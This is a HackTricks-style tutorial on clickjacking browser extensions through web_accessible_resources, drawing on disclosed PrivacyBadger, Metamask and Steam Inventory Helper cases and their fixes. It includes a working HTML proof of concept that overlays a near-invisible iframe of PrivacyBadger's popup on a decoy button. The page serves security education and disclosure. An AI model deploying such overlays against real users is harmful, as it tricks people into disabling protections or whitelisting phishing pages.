BrowExt - ClickJacking

☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥

Do you work in a cybersecurity company? Do you want to see your company advertised in HackTricks? or do you want to have access to the latest version of the PEASS or download HackTricks in PDF? Check the SUBSCRIPTION PLANS!
Discover The PEASS Family, our collection of exclusive NFTs
Get the official PEASS & HackTricks swag
Join the 💬 Discord group or the telegram group or follow me on Twitter 🐦@carlospolopm.
Share your hacking tricks by submitting PRs to the hacktricks repo and hacktricks-cloud repo.

Basic Information

This page is going to abuse a ClickJacking vulnerability in a Browser extension.
If you don't know what ClickJacking is check:

{% content-ref url="../clickjacking.md" %} clickjacking.md {% endcontent-ref %}

Extensions contains the file manifest.json and that JSON file has a field web_accessible_resources. Here's what the Chrome docs say about it:

These resources would then be available in a webpage via the URL chrome-extension://[PACKAGE ID]/[PATH], which can be generated with the extension.getURL method. Allowlisted resources are served with appropriate CORS headers, so they're available via mechanisms like XHR.1

In addition to being web accessible, the resources in the web_accessible_resources run with the ambient authority of the extension: they can alter state, load other resources, and modify the browser in certain ways. If a document in web_accessible_resources can perform any interesting behavior, an attacker can embed it in a webpage and trick visitors into triggering it.

PrivacyBadger Example

It was discovered that the extension PrivacyBadger, the contents of the directory skin/ were web_accessible_resources:

"web_accessible_resources": [
  "skin/*",
  "icons/*"
]

So, by loading skin/popup.html, the document that gets rendered when you click the the PrivacyBadger icon in the browser, in an iframe we could fool the user into clicking "Disable PrivacyBadger for this Website", opening up the user to additional tracking and undermining the function of PrivacyBadger. Check the ClickJacking video example in https://blog.lizzie.io/clickjacking-privacy-badger/badger-fade.webm

The fix was easy: remove /skin/* from the web_accessible_resources.

PoC

<style>
iframe {
    width: 430px;
    height: 300px;
    opacity: 0.01;
    float: top;
    position: absolute;
}

#stuff {
    float: top;
    position: absolute;
}

button {
    float: top;
    position: absolute;
    top: 168px;
    left: 100px;
}

</style>

<div id="stuff">
    <h1>
    Click the button
    </h1>
    <button id="button">
      click me
    </button>
</div>

<iframe src="chrome-extension://ablpimhddhnaldgkfbpafchflffallca/skin/popup.html">
</iframe>

Metamask Example

A blog post about a ClickJacking in metamask can be found here. In this case, Metamask fixed the vulnerability by checking that the protocol used to access it was https: or http: (not chrome: for example):

Another ClickJacking fixed in the Metamask extension was that users were able to Click to whitelist when a page was suspicious of being phishing because of “web_accessible_resources”: [“inpage.js”, “phishing.html”]. As that page was vulnerable to Clickjacking, an attacker could abuse it showing something normal to make the victim click to whitelist it without noticing, and then going back to the phishing page which will be whitelisted.

Steam Inventory Helper Example

Check the following page to check how a XSS in a browser extension was chained with a ClickJacking vulnerability:

{% content-ref url="browext-xss-example.md" %} browext-xss-example.md {% endcontent-ref %}

References

https://blog.lizzie.io/clickjacking-privacy-badger.html